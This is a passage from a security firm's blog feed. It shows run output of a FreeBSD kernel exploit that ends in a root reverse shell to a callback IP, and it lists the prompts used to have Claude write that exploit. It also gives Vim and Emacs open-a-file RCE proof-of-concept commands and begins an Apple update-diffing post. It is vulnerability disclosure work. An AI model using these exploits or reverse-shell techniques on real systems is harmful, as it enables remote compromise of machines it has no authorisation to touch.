data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;7b98d5b0-d670-481a-8a58-04c891e82ff1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">python3 exploit.py -t 127.0.0.1 --ip 10.0.2.2 --port 4444
==============================================================
  CVE-2026-4747: FreeBSD RPCSEC_GSS Remote Kernel RCE
  Stack overflow &#8594; ROP &#8594; shellcode &#8594; uid 0 reverse shell
==============================================================

  [*] Starting listener on 0.0.0.0:4444...
  [*] Starting listener on 0.0.0.0:4444...

  Target:   127.0.0.1:2049
  Callback: 10.0.2.2:4444
  SPN:      nfs/freebsd-vuln@TEST.LOCAL

  Shellcode: 432 bytes (54 qwords)
  Delivery:  15 rounds (1 pmap + 14 write)

  [R1/15] pmap_change_prot(BSS, 0x2000, RWX)
  [+] BSS is now RWX

  [R2/15] write (4 qwords &#8594; 0xffffffff8198a800) &#10003;
  [R3/15] write (4 qwords &#8594; 0xffffffff8198a820) &#10003;
  [R4/15] write (4 qwords &#8594; 0xffffffff8198a840) &#10003;
  [R5/15] write (4 qwords &#8594; 0xffffffff8198a860) &#10003;
  [R6/15] write (4 qwords &#8594; 0xffffffff8198a880) &#10003;
  [R7/15] write (4 qwords &#8594; 0xffffffff8198a8a0) &#10003;
  [R8/15] write (4 qwords &#8594; 0xffffffff8198a8c0) &#10003;
  [R9/15] write (4 qwords &#8594; 0xffffffff8198a8e0) &#10003;
  [R10/15] write (4 qwords &#8594; 0xffffffff8198a900) &#10003;
  [R11/15] write (4 qwords &#8594; 0xffffffff8198a920) &#10003;
  [R12/15] write (4 qwords &#8594; 0xffffffff8198a940) &#10003;
  [R13/15] write (4 qwords &#8594; 0xffffffff8198a960) &#10003;
  [R14/15] write (4 qwords &#8594; 0xffffffff8198a980) &#10003;
  [R15/15] write + EXECUTE (2 qwords &#8594; 0xffffffff8198a9a0) &#8594; JUMP 0xffffffff8198a800

  [*] Shellcode delivered and executing.
  [*] kproc_create &#8594; kern_execve('/bin/sh -c ...')
  [*] Reverse shell &#8594; 10.0.2.2:4444

  [*] Waiting for reverse shell...
  [+] Connection from 127.0.0.1:41320
  [+] Got shell!

sh: can't access tty; job control turned off
# id                  
uid=0(root) gid=0(wheel) groups=0(wheel)</code></pre></div><p>Check out the full <a href="https://github.com/califio/publications/blob/main/MADBugs/CVE-2026-4747/exploit.py">exploit</a> and the <a href="https://github.com/califio/publications/blob/main/MADBugs/CVE-2026-4747/write-up.md">write-up</a>. Claude wrote everything itself. Here are the prompts we used (excuse the typos):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;9bb70303-88ec-43f5-bfcd-a4d2589c6cc0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">1. https://www.freebsd.org/security/advisories/FreeBSD-SA-26:08.rpcsec_gss.asc we want to setup a test env for this vulnerability using docker preferably so the docker files can be copied later for easy repro. password for this vm is x , you should setup a vulnerable version of FreeBSD the latest it mentions and then trigger the vulnerability
2. we want to use docker for this not qemu if possible.. we should still be able to connect and debug it the same i assume
3. why does it need to be QEMU and not docker for this to be a real exploit?
4. no just use QEMU then
5. okay now can you maybe generate an entire RCE exploit for this image ?
6. wait what are you compiling? arent we testing it inside of the Fbsd VM using the actual FBSD module as described in the advisory ?
7. i mean why wouldnt you just install a vulnerable version as mentioned in the advisory
8. okay contoninue to trigger this vuln.
9. what old qemu did you kill? we are using qemu in another session as well. do not kill that Linux qemu.
10. why is it running on 2222 2049 and 1111
11. okay now what about getting RCE.
12. tere is no kaslr so it should be easy
13. install ropgadget or what ever you need ... idk
14. no we dont want to reboot? we want a reverse shell as uid 0 if possible ?
15. okay in ../FBSD-001 there is a different remote exploit that gets a shell.. read it for how they constructed the connect back as uid 0 maybe
16. is the ucred write even needed if the proc is uid0 ? and why dont we get a shell ? or can we demon strait somehow a unpriv non root user that elevates to root? but we still want a shell.. as uid0
17. from a remote context aka the exploit should be executed from outside the vm
18. no just continue to get the remote version working. use gdb and hat ever tools you need.
19. you should do this step by step - for the remote version foucs on triggering then getting PC control then the rop.
20. you need to keep notes of our current status and what you have done to get here. thanks.
21. you should verify everything with gdb if you need etc.
22. 1. Pure ROP &#8212; no shellcode needed, but we're stuck on rax&#8594;rdi transfer (no gadget exists in this kernel) how are ou searching for rop gadgets?
23. why do we need kdc ?
24. nope that wont work as we cant do that from a remote exploit context without having accss to the shell
25. dont think we can prestage a /tmp/x ..
26. working means a connectback shell as uid0
27. when you get it workng i want a complete writeup of th evuln, the exploit methodology, the ropchain, the overflow, and how to install and setup a vuln target
for testing
28. i want a shell.
29. wait what do you mean increase nfs threadcount i guess we should use defaults here..
30. no just continue to get the remote version working. use gdb and hat ever tools you need.
31. make the writeup better explaining each step of the exploit and why
32. also # SSH tunnel for Kerberos KDC sshpass -p freebsd ssh -L 8888:127.0.0.1:88 -N -f -p 2222 root@127.0.0.1 is it possible to do without an ssh tunnel ?
33. can you do the forward nstead of ssh tunnel then test the exploit again
34. /tmp/final_exploit hardly looks like the final exploit ...
35. why dont you make a nicer exploit where you can supply a target and cb ip ... and do everything inline in that exploit
36. the rop / shellcode everything ..
37. the writeup feels kind of bare, explain the shellcode as if the reader has never seen FBSD001 also what do you mean the "bruteforce" version?
38. also retest and verify it works
39. update the writeup to tell how to also setup a vulnerable target using vmware for example without a KDC tunnel
40. how can i boot the qemu and test it
41. why is KDC required? and nfsd ?
42. okay you noted this stuff in the writeup?
43. do you have the prompt log ? i want to see the original prompt for this
44. can you give me back all the prompts i entered in this session</code></pre></div><h2>What Claude Accomplished</h2><p>Going from a vulnerability advisory to a working remote root shell required Claude to solve six distinct problems. It&#8217;s worth noting that FreeBSD made this easier than it would be on a modern Linux kernel: FreeBSD 14.x has no KASLR (kernel addresses are fixed and predictable) and no stack canaries for integer arrays (the overflowed buffer is <code>int32_t[]</code>).</p><ol><li><p><strong>Lab setup</strong>: Stand up a FreeBSD VM with NFS, Kerberos, and the vulnerable kernel module, all configured so the overflow is reachable over the network. Claude knew the VM needed 2+ CPUs because FreeBSD spawns 8 NFS threads per CPU, and the exploit kills one thread per round. This included setting up remote debugging so Claude could read kernel crash dumps.</p></li><li><p><strong>Multi-packet delivery</strong>: The shellcode doesn&#8217;t fit in one packet. Claude devised a 15-round strategy: make kernel memory executable, then write shellcode 32 bytes at a time across 14 packets. In another exploit privately shared with us, Claude used a different strategy: writing a public key to <code>.ssh/authorized_keys</code> instead of a reverse shell, which shortened the exploit to 6 rounds.</p></li><li><p><strong>Clean thread exit</strong>: Each overflow hijacks an NFS kernel thread. Claude used kthread_exit() to terminate each thread cleanly, keeping the server alive for the next round.</p></li><li><p><strong>Offset debugging</strong>: The initial stack offsets from disassembly were wrong. Claude sent De Bruijn patterns (a common technique, but a term we hadn't heard of before reading the writeup), read the crash dumps, and corrected the offsets.</p></li><li><p><strong>Kernel-to-userland transition</strong>: NFS threads can&#8217;t run userland programs. Claude created a new process via <code>kproc_create()</code>, used <code>kern_execve()</code> to replace it with <code>/bin/sh</code>, and cleared the <code>P_KPROC</code> flag so the process could transition to user mode.</p></li><li><p><strong>Hardware breakpoint bug</strong>: The child process kept crashing with a debug exception. Claude traced this to stale debug registers inherited from DDB and fixed it by clearing DR7 before forking.</p></li></ol><h1>Conclusion</h1><p>Computers have always been able to find bugs in software. Fuzzers like AFL and syzkaller have been discovering kernel vulnerabilities for over a decade. But finding a bug and exploiting it are very different things. Exploit development requires understanding OS internals, crafting ROP chains, managing memory layouts, debugging crashes, and adapting when things go wrong. This has long been considered the frontier that only humans can cross.</p><p>Each new AI capability is usually met with &#8220;AI can do Y, but only humans can do X.&#8221; Well, for X = exploit development, that line just moved.</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: vim vs emacs vs Claude]]></title><description><![CDATA[We asked Claude to find a bug in Vim. It found an RCE. Just open a file, and you&#8217;re owned. We joked: fine, we&#8217;ll switch to Emacs. Then Claude found an RCE there too.]]></description><link>https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Mon, 30 Mar 2026 20:33:53 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!IDy_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>It started like this:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IDy_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IDy_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 424w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 848w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1272w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IDy_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png" width="360" height="592.781954887218" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1314,&quot;width&quot;:798,&quot;resizeWidth&quot;:360,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IDy_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 424w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 848w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1272w, https://substackcdn.com/image/fetch/$s_!IDy_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa219122f-e67e-46e4-b598-c7c6967fedce_798x1314.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>PoC:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:&quot;95957b4d-0b75-46c3-b062-46083e89fd45&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc</code></pre></div><p>Vim maintainers <a href="https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh">fixed</a> the issue immediately. Everybody is encouraged to upgrade to Vim v9.2.0272.</p><p>Full advisory can be found <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/vim.md">here</a>. <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/vim-claude-prompts.txt">The original prompt</a> was simple:</p><blockquote><p>Somebody told me there is an RCE 0-day when you open a file. Find it.</p></blockquote><p>This was already absurd. But the story didn&#8217;t end there:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!bU3_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!bU3_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 424w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 848w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1272w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!bU3_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png" width="334" height="269.5438596491228" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:460,&quot;width&quot;:570,&quot;resizeWidth&quot;:334,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!bU3_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 424w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 848w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1272w, https://substackcdn.com/image/fetch/$s_!bU3_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F704d8e1c-2d23-40d2-ac1c-e0e9111169e1_570x460.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>PoC:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:&quot;05969e29-896f-46d5-94f3-ed465313270d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">wget https://github.com/califio/publications/raw/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/emacs-poc.tgz
tar -xzpvf emacs-poc.tgz
emacs emacs-poc/a.txt
cat /tmp/pwned</code></pre></div><p>We immediately reported the bug to GNU Emacs maintainers. The maintainers declined to address the issue, attributing it to git.</p><p>Full advisory can be found <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/Emacs.md">here</a>. <a href="https://github.com/califio/publications/blob/main/MADBugs/vim-vs-emacs-vs-claude/emacs-claude-prompts.txt">The prompt</a> this time:</p><blockquote><p>I&#8217;ve heard a rumor that there are RCE 0-days when you open a txt file without any confirmation prompts.</p></blockquote><p>---</p><p>So how do you make sense of this?</p><p>How do we professional bug hunters make sense of this? This feels like the early 2000s. Back then a kid could hack anything, with SQL Injection. Now with Claude.</p><p>And friends, to celebrate this historic moment, we&#8217;re launching <em><a href="https://blog.calif.io/p/mad-bugs-month-of-ai-discovered-bugs">MAD Bugs: Month of AI-Discovered Bugs</a></em>. From now through the end of April, we&#8217;ll be publishing more bugs and exploits uncovered by AI. Watch this space, more fun stuff coming!</p>]]></content:encoded></item><item><title><![CDATA[Reverse engineering Apple’s silent security fixes]]></title><description><![CDATA[I grabbed the latest iOS update, and diffed it with ipsw. The diff reveals at least two security-relevant changes that were shipped quietly.]]></description><link>https://blog.calif.io/p/reverse-engineering-apples-silent</link><guid isPermaLink="false">https://blog.calif.io/p/reverse-engineering-apples-silent</guid><pubDate>Fri, 27 Mar 2026 06:43:50 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!j9FW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Remember Rapid Security Responses (RSR)? Apple introduced RSR in macOS Ventura / iOS 16 to ship urgent security patches outside of full OS updates. It was used exactly once and <a href="https://mjtsai.com/blog/2025/09/23/rapid-security-responses-become-background-security-improvements/">broke websites</a> because parentheses in the User-Agent header confused half the Internet and was quietly shelved.</p><p>With iOS 26.1, iPadOS 26.1, and macOS 26.1, Apple replaced RSR with Background Security Improvements (BSI). The big change: BSI installs silently.</p><p>On March 17, 2026, Apple shipped four BSI updates across iOS, iPadOS, and macOS. </p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;71b38c3c-9acb-439e-b590-5c215ed1b47e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">| Platform | Version    | Build      |
+----------+------------+------------+
| iOS      | 26.3.1 (a) | 23D771330a |
| iPadOS   | 26.3.1 (a) | 23D771330a |
| macOS    | 26.3.2 (a) | 25D771400a |
| macOS    | 26.3.1 (a) | 25D771280a |
+----------+------------+------------+</code></pre></div><p>I grabbed the iOS update, tore it apart with <a href="https://github.com/blacktop/ipsw">ipsw</a>, and diffed it against the base OS to see what actually changed.</p><p>This post walks through how BSI updates work under the hood. More importantly, it shows what Apple actually shipped: one publicly disclosed WebKit CVE, and at least two additional security-relevant changes that didn&#8217;t make it into the advisory.</p><h3>How BSI differs from RSR</h3><p>Both target the same thing: security patches for Safari, WebKit, and system libraries without a full OS update. Under the hood, both work by patching cryptexes. If you haven&#8217;t run into these before: Apple moved content eligible for rapid patching (Safari, WebKit, system libs) into sealed disk images on the preboot volume, split into system and app subtypes. When an update arrives, the device applies a binary diff to the relevant cryptex image, then asks Apple&#8217;s signing service for a new Cryptex1Image4 manifest. The main application processor (AP) boot ticket stays untouched. On restart, the kernel bootstraps the patched content with new measurements and trust caches. That&#8217;s why these updates work with minimal battery and no re-sealing; they&#8217;re patching a sidecar image, not the root filesystem. <a href="https://support.apple.com/guide/security/background-security-improvements-sec87fc038c2/web">Apple&#8217;s security docs</a> have the full picture.</p><p>The following table summarizes the changes between RSR and BSI:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!j9FW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!j9FW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 424w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 848w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1272w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!j9FW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png" width="1272" height="562" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:562,&quot;width&quot;:1272,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:92852,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/192281495?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!j9FW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 424w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 848w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1272w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The versioning scheme carries over: a BSI applied on top of iOS 26.3 becomes iOS 26.3.1 (a). These are cumulative, so the next full update (say, iOS 26.4) absorbs all prior BSI fixes.</p><p>I will now show you how to analyze the BSI with <code>ipsw</code>.</p><h3>Downloading a BSI with ipsw</h3><p>Same as RSR. Use the <code>--rsr</code> flag with the 